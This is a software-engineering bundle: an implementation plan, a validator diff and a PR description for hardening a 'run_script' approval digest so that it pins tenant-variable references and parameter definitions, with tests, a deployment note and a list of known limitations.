+| Resolver map + `run_script` resolver (pins only `orgId`/`language`/`content`/`timeoutSeconds`/`runAs`) | `apps/api/src/services/actionIntents/effectDigest.ts:105-152` |
+| The **false** exclusion comment for `scripts.parameters` | `effectDigest.ts:119-122` |
+| `ResolverResult` three-way union (`material` / `missing_arg` / `target_absent`) | `effectDigest.ts:83-90` |
+| Central hash — sha256 hex, **no canonicalization layer** | `effectDigest.ts:348-361` |
+| `computeEffectDigest` flattener returning `string \| null` | `effectDigest.ts:372-379` |
+| `hasPinnedDigest` | `effectDigest.ts:394-396` |
+| Pin site (inside the creation transaction; no scope branch) | `apps/api/src/services/actionIntents/intentService.ts:407-408`, stored at `:441` |
+| Column | `apps/api/src/db/schema/actionIntents.ts:169` (`char('effect_digest', {length:64})`), immutable trigger |
+| Durable release: recompute + compare | `apps/api/src/jobs/intentReleaseWorker.ts:369-412`; execute at `:459` |
+| Inline release: recompute + compare | `apps/api/src/services/aiAgentSdk.ts:1188-1206` |
+| `executeTool` signature + handler dispatch | `apps/api/src/services/aiTools.ts:423-476`; handler called at `:475` |
+| `AiTool.handler` type — `(input, auth) => Promise<string>`, **189 handlers, none takes a third arg** | `aiTools.ts:186-202` |
+| Extension mirror of the handler type | `packages/extension-sdk/src/server.ts:9-14`; cloned at `apps/api/src/extensions/contributionRegistry.ts:68-95` |
+| `run_script` handler (script re-query at `:185-189`, scope built at `:300-302`, dispatch at `:303`) | `apps/api/src/services/aiToolsScripts.ts:156-318` |
+| `DispatchScriptInput.variableScope` — an existing explicit pre-resolved-snapshot channel | `apps/api/src/services/scriptDispatch.ts:73-78` |
+| `TenantVariableScope` (opaque; private `byOrg`) + `resolveForOrg` membership check | `apps/api/src/services/tenantVariableResolution.ts:47-66`, `:222` |
+| `ResolvedVariable` — already carries `variableId`, `version`, `isSecret`, `ownerScope` | `tenantVariableResolution.ts:29-45` |
+| `decryptRow` — **fail-soft**, omits the row on decrypt failure | `tenantVariableResolution.ts:85-107` |
+| Org-over-partner precedence, deliberate two-pass | `tenantVariableResolution.ts:181-198` |
+| `findVariableTokens` / `hasVariableTokens` | `packages/shared/src/validators/variableTokens.ts:56-72` |
+| `scriptParameterDefinitionsEqual` + env-collision rule — **reuse, do not reinvent** | `packages/shared/src/validators/scriptParameterDefinitions.ts` |
+| `scriptNeedsVariableScope` (content tokens OR bound parameters) | `apps/api/src/services/sourcedParameters.ts:249-254` |
+| Three **stale** comments claiming supervised intents are never pinned | `intentReleaseWorker.ts:356-358`, `aiAgentSdk.ts:1172-1174`, `db/schema/actionIntents.ts:163-168` |
+| AsyncLocalStorage exists for DB context ONLY; `runOutsideDbContext` is per-store `.exit()` | `apps/api/src/db/index.ts:110-118` |
+| Precedent for "handler needs more context": fork the registry and bypass `executeTool` (`makeSessionAwareHandler`) | `apps/api/src/services/aiAgentSdkTools.ts:493-520`; note at `aiTools.ts:174-178` |
+
+---
+
+## Deployment hazard — read before Task 1
+
+Bumping the digest material invalidates **every already-approved, not-yet-released `run_script` intent**: its stored `v1` digest can never equal a `v2` recompute, so it fails `content_changed` at release.
+
+That is the correct direction (fail closed, an operator re-approves), but it is operator-visible and must not be a surprise:
+
+- It is bounded — only intents in `approved` state awaiting release, for one tool.
+- **Do not** attempt a compatibility shim that recomputes v1 and accepts either. A dual-accept path is exactly the bypass this PR exists to close.
+- Task 8 requires a release note entry and a one-line count query the operator can run before deploying:
+  `SELECT count(*) FROM action_intents WHERE status='approved' AND action_name='run_script';`
+
+---
+
+## File Structure
+
+**Create**
+
+| File | Responsibility |
+|---|---|
+| `apps/api/src/services/actionIntents/runScriptSnapshot.ts` | Build the verified `run_script` snapshot (script row + canonical parameter definitions + per-org variable reference metadata); produce its digest material; expose the resolved scope for reuse at dispatch. |
+| `apps/api/src/services/actionIntents/runScriptSnapshot.test.ts` | Unit tests for material shape, determinism, absent/unreadable sentinels, and the no-plaintext invariant. |
+| `apps/api/src/services/toolExecutionContext.ts` | The typed `ToolExecutionContext` carrier threaded from release verification into a handler. |
+
+**Modify**
+
+| File | Change |
+|---|---|
+| `apps/api/src/services/tenantVariableResolution.ts` | Distinguish unreadable from absent; expose reference metadata without values. |
+| `apps/api/src/services/actionIntents/effectDigest.ts` | `run_script` resolver consumes the snapshot builder; v2 material; correct the false exclusion comment. |
+| `apps/api/src/jobs/intentReleaseWorker.ts` | Carry the verified snapshot from compare to execute; fix the stale comment. |
+| `apps/api/src/services/aiAgentSdk.ts` | Same for the inline path; fix the stale comment. |
+| `apps/api/src/services/aiTools.ts` | Optional `ToolExecutionContext` parameter on `executeTool` and on `AiTool.handler`. |
+| `apps/api/src/services/aiToolsScripts.ts` | `run_script` consumes the snapshot instead of re-querying. |
+| `apps/api/src/db/schema/actionIntents.ts` | Fix the stale `effect_digest` doc comment. |
+
+---
+
+### Task 1: Distinguish an unreadable variable from an absent one
+
+`decryptRow` (`tenantVariableResolution.ts:85-107`) catches, warns, returns null, and the row is omitted from the scope. Downstream that is indistinguishable from "no such key": `substituteTenantVariables` reports `no value set for {{var.k}}`, and `lookupBoundSource` reports `{kind:'missing'}`. For the digest that is unacceptable — an unreadable variable would pin as `absent`, and a later successful decrypt (key rotation fixed) would read as drift, or worse, an approval would be granted against a variable nobody can actually read.
+
+**Files:**
+- Modify: `apps/api/src/services/tenantVariableResolution.ts`
+- Test: `apps/api/src/services/tenantVariableResolution.test.ts`
+
+**Interfaces:**
+- `TenantVariableScope` gains `readonly unreadableKeysByOrg: ReadonlyMap<string, ReadonlySet<string>>` (or an equivalent accessor — keep `byOrg` private, and follow the module's existing "the snapshot is opaque, `resolveForOrg` is the only sanctioned accessor" design; add `unreadableForOrg(scope, orgId): ReadonlySet<string>` with the same membership check that `resolveForOrg` performs).
+
+- [ ] **Step 1: Write the failing tests**
+
+In `tenantVariableResolution.test.ts`:
+- A row whose decrypt throws is reported as **unreadable**, not absent, and is still omitted from the resolved value map (no placeholder value ever).
+- A key that simply does not exist is **absent** and appears in neither collection.
+- `unreadableForOrg` throws for an org not in the snapshot, exactly like `resolveForOrg`.
+- Org-over-partner precedence is preserved: an unreadable **org** row shadows a readable partner row (the org row won the precedence pass, so the key is unreadable — it must NOT silently fall back to the partner value, which would substitute a different tenant's material).
+
+That last case is the subtle one. Read the two-pass precedence at `:181-198` before implementing and make the behaviour explicit in a comment.
+
+- [ ] **Step 2: Run to verify RED**, then implement, then GREEN.
+
+Run: `pnpm --filter @breeze/api test -- src/services/tenantVariableResolution.test.ts`
+
+- [ ] **Step 3: Sweep the consumers**
+
+`resolveForOrg` has five callers (`scriptExecution.ts`, `automationRuntime.ts`, `aiToolsScripts.ts`, `softwareDeployment.ts`, `scriptBundle/index.ts`). This task must not change their behaviour — an unreadable variable stays a per-device failure. Only the *reporting channel* becomes distinguishable. Confirm each still compiles and its tests pass, and report any site where "unreadable" should produce a better message than today (record it; do not fix it here).
+
+- [ ] **Step 4: Commit**
+
+```bash
+git commit -m "feat(api): distinguish unreadable tenant variables from absent ones (#3409 PR4c-1)"
+```
+
+---
+
+### Task 2: The `run_script` verified snapshot builder
+
+**Files:**
+- Create: `apps/api/src/services/actionIntents/runScriptSnapshot.ts`
+- Create: `apps/api/src/services/actionIntents/runScriptSnapshot.test.ts`
+
+**Interfaces:**
+
+```ts
+export type VariableReferenceState = 'present' | 'absent' | 'unreadable';
+
+export type PinnedVariableReference = {
+  orgId: string;
+  key: string;
+  state: VariableReferenceState;
+  // present only when state === 'present' — NEVER the value
+  variableId?: string;
+  version?: number;
+  isSecret?: boolean;
+  ownerScope?: 'organization' | 'partner';
+};
+
+export type RunScriptSnapshot = {
+  script: { id: string; orgId: string | null; language: string; content: string; timeoutSeconds: number; runAs: string };
+  parameterDefinitions: unknown;      // canonicalized, see Step 3
+  deviceOrgIds: string[];             // sorted, unique
+  variableReferences: PinnedVariableReference[];  // sorted by (orgId, key)
+  variableScope: TenantVariableScope; // the SAME snapshot dispatch will use
+};
+
+export async function buildRunScriptSnapshot(args, database): Promise<
+  | { kind: 'snapshot'; snapshot: RunScriptSnapshot }
+  | { kind: 'missing_arg' }
+  | { kind: 'target_absent' }
+>;
+
+export function runScriptDigestMaterial(snapshot: RunScriptSnapshot): string;
+```
+
+- [ ] **Step 1: Write the failing tests**
+
+`runScriptSnapshot.test.ts` — follow the existing `effectDigest.test.ts` harness exactly (hand-rolled `makeFakeDb(queue)` chainable stub, `scriptRow()` factory; **no `vi.mock` of the db module**). Required cases:
+
+*Material content:*
+- Material includes the five existing script fields, the canonical parameter definitions, and the sorted variable references.
+- **Material contains no variable VALUE.** Build a snapshot whose variable value is a distinctive string and assert `runScriptDigestMaterial(...)` does not contain it. This is the single most important test in the PR — write it first.
+- Material is a `v: 2` envelope, and a v1-shaped material never equals a v2 one.
+
+*Determinism:*
+- Two snapshots differing only in device-id ORDER produce identical material.
+- Two snapshots differing only in variable insertion order produce identical material (sort by `(orgId, key)`).
+- Two snapshots differing only in parameter-definition key order produce identical material.
+
+*Drift sensitivity — each of these must CHANGE the material:*
+- variable `version` bumped
+- `isSecret` flipped **true→false** and **false→true** (both directions, separate cases)
+- `variableId` changed (an org override added, shadowing a partner-wide variable — same key, same value, different id)
+- a reference going `present → absent`
+- a reference going `present → unreadable`
+- a parameter definition's `variableKey` rebound
+- a parameter definition added or removed
+
+*Reference enumeration:*
+- References are the UNION of content tokens (`findVariableTokens(script.content)`) and every parameter definition's `variableKey`.
+- A script with neither yields an empty reference list and does no variable query at all.
+- One reference per (org, key) pair, for every device org — the same key resolving differently in two orgs produces two entries.
+
+*Resolver outcomes:*
+- Missing `scriptId` → `missing_arg`; soft-deleted or absent script → `target_absent`, mirroring the existing resolver's `isNull(deletedAt)` filter.
+- Absent `deviceIds`, or an empty array → decide and TEST one behaviour: treat as `missing_arg` (the tool schema marks `deviceIds` required). Document the choice in a comment.
+
+- [ ] **Step 2: Verify RED, implement, verify GREEN**
+
+Implementation notes:
+- Resolve `deviceIds` → org ids with one query; sort and dedupe. A device id that does not resolve must **not** be silently dropped — that changes the reference set. Treat an unresolvable device as `target_absent`.
+- Reuse `loadTenantVariableScope(orgIds)` and `resolveForOrg` / `unreadableForOrg` (Task 1). Do not write a second resolution query.
+- Canonicalize parameter definitions with the existing `@breeze/shared` helper rather than a new serializer — read `scriptParameterDefinitionsEqual` and the surrounding module first and reuse its normalization. If no canonical *serializer* exists (only an equality predicate), add one **there**, beside the predicate, so the two cannot drift.
+- Sorting must be explicit (`localeCompare` or codepoint — pick one, state it in a comment, and test it), not incidental.
+
+- [ ] **Step 3: Commit**
+
+```bash
+git commit -m "feat(api): verified run_script snapshot with pinned tenant-variable references (#3409 PR4c-1)"
+```
+
+---
+
+### Task 3: Wire the snapshot into the effect digest
+
+**Files:**
+- Modify: `apps/api/src/services/actionIntents/effectDigest.ts`
+- Test: `apps/api/src/services/actionIntents/effectDigest.test.ts`
+
+- [ ] **Step 1: Write the failing tests**
+
+Extend `effectDigest.test.ts` (do not create a parallel file): the `run_script` resolver now returns material built by `runScriptDigestMaterial`, still returns `missing_arg` / `target_absent` in the same conditions, and the digest changes for each drift case from Task 2.
+
+- [ ] **Step 2: Implement**
+
+Replace the `run_script` resolver body (`:128-152`) with a call to `buildRunScriptSnapshot` + `runScriptDigestMaterial`.
+
+**Rewrite the comment at `:119-122`.** Its current claim — that `scripts.parameters` "has no effect on execution" because the handler passes `input.parameters` and never the column — is **false as of PR3**: the column drives `scriptNeedsVariableScope` and per-parameter `tenantVariable` bindings at `scriptDispatch.ts`. The new comment must say the column IS pinned, and why the old reasoning stopped holding, so nobody re-derives the exclusion.
+
+Keep the resolver's existing `isNull(deletedAt)` filter and its `target_absent` semantics.
+
+- [ ] **Step 3: Check the coverage contract**
+
+`effectDigestCoverage.contract.test.ts` asserts every four-eyes surface either resolves or sits in a `DELIBERATELY_UNPINNED` allowlist with a written reason. Run it and confirm it still passes; if the run_script entry carries a stale reason, update it.
+
+- [ ] **Step 4: Commit**
+
+```bash
+git commit -m "feat(api): pin parameter definitions and tenant-variable references in the run_script digest (#3409 PR4c-1)"
+```
+
+---
+
+### Task 4: Correct the three stale "never pinned for supervised" comments
+
+Pinning stopped being gated on `approvalScope === 'four_eyes'` on 2026-08-06, but three comments still tell the reader that a supervised intent is never pinned. Each sits directly above a branch that in fact runs for supervised intents. A future reader trusting them will conclude the branch is dead.
+
+**Files:** `apps/api/src/jobs/intentReleaseWorker.ts:356-358`, `apps/api/src/services/aiAgentSdk.ts:1172-1174`, `apps/api/src/db/schema/actionIntents.ts:163-168`.
+
+Comment-only. No behaviour change, no test change. Verify by reading `intentService.ts:407-408` (no scope branch) and `intentService.test.ts:823-843` (the supervised-pinning regression test) that the corrected text is true.
+
+- [ ] **Commit**
+
+```bash
+git commit -m "docs(api): correct three stale comments claiming supervised intents are never digest-pinned"
+```
+
+---
+
+### Task 5: The `ToolExecutionContext` carrier
+
+**Files:**
+- Create: `apps/api/src/services/toolExecutionContext.ts`
+- Modify: `apps/api/src/services/aiTools.ts`
+- Test: `apps/api/src/services/aiTools.executeToolGate.test.ts`
+
+**Design — chosen deliberately; do not substitute an AsyncLocalStorage store.** ALS was considered and rejected: the inline release path verifies in `aiAgentSdk.ts` and executes later from `aiAgentSdkTools.ts`'s handler factory, coupled only through `pendingIntentBySession`, so the two are not in one async scope; and both SDK handler factories call `runOutsideDbContext` around the whole handler, so context-exit semantics are already load-bearing in this area. An explicit typed parameter is greppable and cannot silently fail to propagate.
+
+- [ ] **Step 1: Write the failing test**
+
+Extend `aiTools.executeToolGate.test.ts` — it already injects a synthetic probe tool into the real registry and calls the real `executeTool`, which is exactly the harness needed. Assert:
+- a context passed to `executeTool` reaches the handler's third argument,
+- omitting it leaves the third argument `undefined`,
+- a handler declared with only `(input, auth)` still works unchanged (this is the compatibility proof for the other 188 handlers).
+
+- [ ] **Step 2: Implement**
+
+```ts
+/**
+ * Material a release path has ALREADY resolved and verified against the
+ * approval's pinned digest, handed to the tool handler so it does not re-query
+ * — a second read reopens the check/use window the digest exists to close.
+ *
+ * Deliberately narrow and deliberately explicit: not on AuthContext (which is
+ * a caller identity, not an execution input), not inside `args` (which is the
+ * digest's own input and is immutable on the intent row).
+ */
+export type ToolExecutionContext = {
+  verifiedRunScript?: RunScriptSnapshot;
+};
+```
+
+Widen `AiTool.handler` to `(input, auth, context?: ToolExecutionContext) => Promise<string>` and add a trailing optional `context` parameter to `executeTool`, forwarded at the `tool.handler(...)` call. Adding an optional trailing parameter is source-compatible with all 189 existing handlers.
+
+Mirror the type widening in `packages/extension-sdk/src/server.ts` **only if** TypeScript requires it for the registry clone in `contributionRegistry.ts` to keep compiling. Extensions must not receive the snapshot — check what the clone does and keep the extension surface unchanged if it can stay unchanged; report which you did and why.
+
+- [ ] **Step 3: Commit**
+
+```bash
+git commit -m "feat(api): explicit ToolExecutionContext channel for pre-verified release material (#3409 PR4c-1)"
+```
+
+---
+
+### Task 6: Carry the snapshot from verification to dispatch
+
+**Files:**
+- Modify: `apps/api/src/jobs/intentReleaseWorker.ts`, `apps/api/src/services/aiAgentSdk.ts`, `apps/api/src/services/aiToolsScripts.ts`
+- Modify: `apps/api/src/services/actionIntents/effectDigest.ts` (expose a compute that returns the snapshot alongside the digest)
+- Tests: `intentReleaseWorker.test.ts`, `aiAgentSdk.test.ts`, `aiToolsScripts.runScript.orgEquality.test.ts`
+
+This is the task with real regression potential. Read all three call paths before editing.
+
+- [ ] **Step 1: Write the failing tests**
+
+- Durable worker: on a digest match, the snapshot produced by the recompute is passed to `executeTool` as the context; on a mismatch, `executeTool` is still never called.
+- Inline SDK path: same, through whatever channel couples `aiAgentSdk.ts`'s verification to `aiAgentSdkTools.ts`'s handler invocation. **If that coupling cannot carry the snapshot without restructuring, STOP and report** — see the fallback below.
+- `run_script` handler: given a context with `verifiedRunScript`, it does **not** re-query the script row and does **not** call `loadTenantVariableScope`; it uses the snapshot's script and `variableScope`. Given no context (direct chat / MCP / script-builder callers), behaviour is exactly as today.
+- `aiToolsScripts.runScript.orgEquality.test.ts` asserts dispatch runs nested inside both `runOutsideDbContext` and `withSystemDbAccessContext` via flag-tracking passthroughs. Those assertions must still hold — do not restructure the escape-hatch nesting.
+
+- [ ] **Step 2: Implement**
+
+Add a compute variant that returns `{ digest, snapshot }` so the release path can compare the digest and keep the snapshot. Do not change `computeEffectDigest`'s existing `string | null` signature — other callers depend on it; add a sibling.
+
+The org-equality and partner checks in the handler (`aiToolsScripts.ts:227-242`) are **security invariants and must keep running** even when a snapshot is supplied. The snapshot removes a re-*read*; it does not remove a *check*.
+
+**Fallback if the inline path cannot carry it:** thread it on the durable worker path only, leave the inline path recomputing-and-re-querying exactly as today, and record the residual race in the ledger and the PR body. A partial fix that is honest beats a restructure of the inline chat release path inside this PR. Do not silently leave it out — if you take the fallback, say so explicitly in your report.
+
+- [ ] **Step 3: Commit**
+
+```bash
+git commit -m "feat(api): hand the verified run_script snapshot to dispatch instead of re-querying (#3409 PR4c-1)"
+```
+
+---
+
+### Task 7: Integration proof against real Postgres
+
+`effectDigestToctou.integration.test.ts` already drives pin → edit → recompute-mismatch → `content_changed` against a real database, using `run_script` as its subject. Extend it — this is the only suite that proves the property end to end.
+
+**Files:** `apps/api/src/__tests__/integration/effectDigestToctou.integration.test.ts`
+
+- [ ] Add, each as a real-database case, mirroring the file's existing structure:
+  - rotating a bound tenant variable's value (version bump) after approval → release fails `content_changed`
+  - flipping `isSecret` on a bound variable **without** a version bump → fails `content_changed` *(the case that pinning version alone would miss)*
+  - adding an **org override** that shadows a partner-wide variable of the same key and same value → fails `content_changed` (different `variableId`)
+  - deleting a bound variable → fails `content_changed`
+  - editing the script's `parameters` column → fails `content_changed` *(this is the PR3 drift bug; it must be RED before Task 3 and GREEN after)*
+  - the negative mirror: an untouched script and untouched variables → releases `completed`
+
+- [ ] Run: `pnpm --filter @breeze/api test:integration -- src/__tests__/integration/effectDigestToctou.integration.test.ts` (confirm the exact script name in `apps/api/package.json` first). Needs a live database.
+
+- [ ] **Commit**
+
+```bash
+git commit -m "test(api): prove tenant-variable and parameter drift fails an approved release (#3409 PR4c-1)"
+```
+
+---
+
+### Task 8: Full verification, release note, and PR
+
+- [ ] **Step 1: Typecheck and the FULL API suite** — not just touched slices. `pnpm --filter @breeze/api test`.
+
+- [ ] **Step 2: The contract and integration suites** — these do NOT run in the unit job, and this PR touches exactly the surface they guard:
+
+```bash
+pnpm --filter @breeze/api test -- src/services/actionIntents/effectDigestCoverage.contract.test.ts
+# integration (needs a live DB):
+pnpm --filter @breeze/api test:integration -- src/__tests__/integration/effectDigestToctou.integration.test.ts
+```
+
+No schema or migration changed in this PR, so the cascade/export-policy contracts are not implicated — **verify that claim** with `git diff --stat origin/main...HEAD -- apps/api/migrations apps/api/src/db/schema` and report the result rather than asserting it.
+
+- [ ] **Step 3: Grep the no-plaintext invariant** — `runScriptDigestMaterial` and everything it calls must never touch `ResolvedVariable.value`. Show the grep output in the report.
+
+- [ ] **Step 4: Rebase onto current main BEFORE opening the PR**, then re-run the touched slices.
+
+- [ ] **Step 5: Release note** for the deployment hazard (see the section above): approved-but-unreleased `run_script` intents must be re-approved after deploy, with the count query.
+
+- [ ] **Step 6: Open the PR.** Body must cover: the PR3 drift bug this fixes; that no secret is delivered yet; the v2 digest invalidation and its operator impact; and, if Task 6's fallback was taken, the residual inline-path race.
+
+---
+
+## Explicitly out of scope
+
+| Item | Where it belongs |
+|---|---|
+| `source: 'tenantSecret'` parameter arm, `secretEnv` population, unblocking secrets | PR4c-2 |
+| Capability gates at enqueue and claim | PR4c-2 |
+| UI for declaring a secret parameter | PR4c-2 |
+| The `softwareDeployment.ts` silent secret filter | PR4c-2 (or its own issue) |
+| Better per-device messages for an unreadable variable at the five `resolveForOrg` callers | Recorded in Task 1 Step 3; own issue |

--- a/docs/superpowers/plans/2026-08-15-pr4c1-digest-pinning-snapshot.md
+++ b/docs/superpowers/plans/2026-08-15-pr4c1-digest-pinning-snapshot.md
@@ -249,6 +249,31 @@ git commit -m "feat(api): pin parameter definitions and tenant-variable referenc
 
 ---
 
+### Task 3b: Resolve variables on the ambient connection, not a second one
+
+*(Added 2026-08-15 after Task 3's review. Plan-owner ruling on an Important finding.)*
+
+Task 3's resolver now calls `loadTenantVariableScope`, which unconditionally does `runOutsideDbContext(() => withSystemDbAccessContext(...))`. In the digest path that **acquires a second pooled connection while the intent-creation transaction is holding one** — the #1105 connection-hold class, against a US pool ceiling of 25. A burst of concurrent intent creations can wedge on it.
+
+**The obvious fix is wrong.** Hoisting the digest out of the transaction would break a deliberate property: `intentService.ts:395-399` states the digest is computed inside the transaction, on the ambient `db`, "so the pinned content and the row it's attached to are read/written atomically — no window where a concurrent edit lands between 'read the target' and 'create the intent'."
+
+**The correct fix is the opposite direction:** let the resolution reuse the ambient connection. All three `computeEffectDigestOutcome` call sites are already system-scoped —
+`intentService.ts:385` (`withSystemDbAccessContext`), `intentReleaseWorker.ts:380` (same), `aiAgentSdk.ts:1189-1192` (`runOutsideDbContext` → `withSystemDbAccessContext`) — so the context escape buys nothing there and costs a connection. Reusing the ambient connection also makes the variable read share the insert's snapshot, which is strictly better for a digest.
+
+**Files:** `apps/api/src/services/tenantVariableResolution.ts`, `apps/api/src/services/actionIntents/runScriptSnapshot.ts`, and their tests.
+
+- [ ] **Step 1: Write the failing test.** `loadTenantVariableScope` given an explicit database performs its query on that database and does **not** call `runOutsideDbContext` / `withSystemDbAccessContext`. Given none, behaviour is exactly as today (all five existing callers). Assert on the escape helpers being called or not — the existing suites already mock them as flag-tracking passthroughs; follow that pattern.
+
+- [ ] **Step 2: Implement.** Add an optional second argument, e.g. `loadTenantVariableScope(orgIds, opts?: { database?: Database })`. When `database` is supplied, run the query directly on it with no context wrapper; otherwise keep today's escape verbatim. The docblock must state the caller contract explicitly: **supplying a database asserts the caller is already system-scoped**, because this query has RLS disabled and its `WHERE o.id = ANY($1)` is the only tenancy boundary. Then have `buildRunScriptSnapshot` pass the `database` it already receives.
+
+- [ ] **Step 3:** Confirm the five existing callers are untouched and their tests still pass.
+
+- [ ] **Step 4 (Minor, from the same review):** in `effectDigest.ts` around the rewritten comment, *"the release side consumes the snapshot's scope"* is present tense for something Task 6 has not built yet. Change to `will consume`.
+
+- [ ] **Step 5: Commit** — `perf(api): resolve tenant variables on the ambient connection in the digest path (#3409 PR4c-1)`
+
+---
+
 ### Task 4: Correct the three stale "never pinned for supervised" comments
 
 Pinning stopped being gated on `approvalScope === 'four_eyes'` on 2026-08-06, but three comments still tell the reader that a supervised intent is never pinned. Each sits directly above a branch that in fact runs for supervised intents. A future reader trusting them will conclude the branch is dead.

--- a/packages/shared/src/validators/scriptParameterDefinitions.ts
+++ b/packages/shared/src/validators/scriptParameterDefinitions.ts
@@ -226,12 +226,37 @@ export function normalizeScriptParameterDefinitions(value: unknown): ScriptParam
   return parsed.success ? parsed.data : null;
 }
 
-/** Stable serialization of one definition — key order independent, arm aware. */
+/** Stable serialization of one definition — key order independent, arm aware.
+ * Sorted by UTF-16 CODE POINT (`<` / `>`), never `localeCompare`: the output
+ * feeds a hash that must be byte-reproducible across processes, and
+ * `localeCompare` depends on the runtime's ICU data and default locale. */
 function canonicalizeDefinition(definition: ScriptParameterDefinition): string {
   const entries = Object.entries(definition as Record<string, unknown>)
     .filter(([, value]) => value !== undefined)
     .sort(([a], [b]) => (a < b ? -1 : a > b ? 1 : 0));
   return JSON.stringify(entries);
+}
+
+/**
+ * Canonical serialization of a whole definition list, or `null` when the value
+ * is not a valid definition list.
+ *
+ * Two lists describe the same parameter contract exactly when their canonical
+ * strings are equal — {@link scriptParameterDefinitionsEqual} is defined in
+ * terms of this function precisely so the two can never drift. The string is
+ * also the form a HASH of the contract should be taken over (#3409 PR4c pins
+ * `scripts.parameters` into the `run_script` effect digest): it is normalized
+ * through the schema, so a legacy `{name,type}` and its default-materialized
+ * equivalent serialize identically, and it is object-key-order independent,
+ * so a jsonb round-trip that reorders keys is not mistaken for a change.
+ *
+ * Element ORDER is significant (parameter order is user-visible in the run
+ * modal), so the list is not sorted.
+ */
+export function canonicalizeScriptParameterDefinitions(value: unknown): string | null {
+  const normalized = normalizeScriptParameterDefinitions(value);
+  if (normalized === null) return null;
+  return JSON.stringify(normalized.map(canonicalizeDefinition));
 }
 
 /**
@@ -246,15 +271,14 @@ function canonicalizeDefinition(definition: ScriptParameterDefinition): string {
  *
  * An unparseable value on either side returns `false` (i.e. "changed"), which
  * is the safe answer for the one caller that matters: `script.version` gets
- * bumped rather than silently held back.
+ * bumped rather than silently held back. Note this means two IDENTICALLY
+ * unparseable values are still reported as changed — deliberate, and the
+ * reason this is not simply `canonical(a) === canonical(b)` with nulls
+ * compared.
  */
 export function scriptParameterDefinitionsEqual(a: unknown, b: unknown): boolean {
-  const left = normalizeScriptParameterDefinitions(a);
-  const right = normalizeScriptParameterDefinitions(b);
+  const left = canonicalizeScriptParameterDefinitions(a);
+  const right = canonicalizeScriptParameterDefinitions(b);
   if (left === null || right === null) return false;
-  if (left.length !== right.length) return false;
-  return left.every((definition, index) => {
-    const other = right[index];
-    return other !== undefined && canonicalizeDefinition(definition) === canonicalizeDefinition(other);
-  });
+  return left === right;
 }


### PR DESCRIPTION
Closes a live approval-integrity gap and lays the foundation for tenant-variable secret delivery (#3409 PR4c-1). Follows PR4a (#3557) and PR4b (#3562), both merged.

**No secret is delivered by this PR.** Secrets remain blocked everywhere; PR4c-2 activates them. This had to land first — see below.

## The bug this fixes

An approved `run_script` action-intent is pinned to an effect digest at approval and recomputed at release, so drift fails the release closed. But the digest pinned only five script fields. It pinned **nothing** about tenant variables, and it deliberately excluded `scripts.parameters` with this reasoning:

> `scripts.parameters` (the jsonb column) is deliberately NOT pinned: the handler passes `input.parameters ?? {}` from the tool call, never the column, so the column has no effect on execution.

**That was true when written and PR3 made it false** — dispatch now reads that column to drive variable-scope loading and per-parameter `tenantVariable` bindings. So between approval and release, someone could rebind a parameter to a different variable, rotate a variable, delete it, flip `isSecret`, or add an org override shadowing a partner-wide value, and the digest would still match. The approver approved one thing; the fleet ran another.

Activating secrets on top of that would have moved credentials through the same gap, which is why the quorum resequenced this ahead of activation.

## What changed

- **The digest now pins** canonicalized parameter definitions and, per device org, every tenant-variable reference: key, variable id, version, `isSecret`, and explicit `absent` / `unreadable` sentinels. `isSecret` is pinned explicitly because it can flip **without** a version bump, so pinning version alone would miss it.
- **Never the value.** The digest lands in `action_intents.effect_digest`, which is widely readable, so only a stable *reference* is pinned. `RunScriptSnapshot` (digest material), `scope` (plaintext-bearing) and `scriptRow` are three siblings, so a stray `JSON.stringify(snapshot)` cannot leak a credential — structurally, not by discipline.
- **Unreadable ≠ absent.** A row whose decrypt fails was previously omitted from the scope, indistinguishable from "never defined". It is now its own state.
- **The check/use race is closed.** The release path resolves once into a verified snapshot and hands it to dispatch through an explicit `ToolExecutionContext` instead of re-querying. Threaded on **both** release paths — durable worker and inline chat.

## A pre-existing tenancy bug found and fixed along the way

`loadTenantVariableScope` recorded its org-over-partner precedence claim only *after* a successful decrypt. So an org-level override whose row failed to decrypt did not shadow the same-key partner-wide row — the second pass resolved the **partner-wide default over the org's own unreadable override**, silently ignoring a deliberate override.

To be precise about scope: this is **not** cross-tenant leakage. The join binds partner-wide rows to the org's own partner and every write is keyed by `forOrgId`, so a different partner's variable or a sibling org's override could never be substituted. It is the org's own inherited default winning where the override should have failed the device. Worth its own issue and a release note independent of this initiative.

## Deployment hazard — read before deploying

The digest material is bumped to a `v: 2` envelope, which **invalidates every already-approved, not-yet-released `run_script` intent**: a v1 digest can never equal a v2 recompute, so it fails `content_changed` and the operator must re-approve.

That is the correct direction, and a dual-accept compatibility shim was deliberately **not** built — it would be exactly the bypass this PR closes. Count the affected intents before deploying:

```sql
SELECT count(*) FROM action_intents WHERE status='approved' AND action_name='run_script';
```

## Known limitations, stated deliberately

- The creation-time digest runs system-scoped, so an unvalidated foreign `deviceId` resolves cross-tenant and decrypts that org's variables **in memory**. No plaintext escapes — the scope is dropped and only references are hashed — and authorization remains the handler's job, but it is a new user-input-reachable cross-tenant read.
- `osTypes` / `partnerId` are un-pinned columns now sourced from the release-time digest read rather than a dispatch-time read. Both happen at release, so the window is milliseconds; only a v3 bump would close it.
- Device→device substitution *within* an already-covered org is not detected by the org-coverage guard. Unreachable today — both release paths derive the digest and the `executeTool` call from the same `arguments` — so this is defense-in-depth only.
- `mcpServer.ts`'s bootstrap carve-out calls `tool.handler` directly, bypassing `executeTool` and therefore the context channel. Pre-existing; no release path reaches it.
- The `scripts` table has no XOR CHECK, so `(org_id NULL, partner_id NULL, is_system false)` is representable. RLS hides such a row from every non-system caller; the verified path now refuses it explicitly. The data-model gap outlives this PR and deserves its own issue.

## Verification

Full API unit suite **22,428 passed / 0 failed**. `effectDigestToctou` + `extensionState` integration suites **13/13 green against real Postgres, re-run after the rebase** — an earlier verification of that suite went stale when `executeTool`'s signature changed two commits later, which is itself the reason for the re-run.

Six new real-database drift cases prove the property end to end: rotation, `isSecret`-without-version-bump, an org override shadowing a partner-wide variable **with the same value** (proving identity rather than value is pinned), deletion, a `parameters`-column edit (the PR3 bug — this case would have been red before), and the negative mirror.

No migration and no schema column changed, so no cascade or export-policy registration is owed — verified with `git diff --stat origin/main...HEAD -- apps/api/migrations apps/api/src/db/schema` rather than assumed.

Built with subagent-driven development from `docs/superpowers/plans/2026-08-15-pr4c1-digest-pinning-snapshot.md`; every task independently reviewed, plus a whole-branch pass. Reviews caught, among others: a fixture change that silently stopped two pre-existing tests from proving `content` was pinned, an authorization layer lost in the query-to-code swap, and a second pooled connection acquired while the intent-creation transaction held one.

## Follow-ups (not this PR)

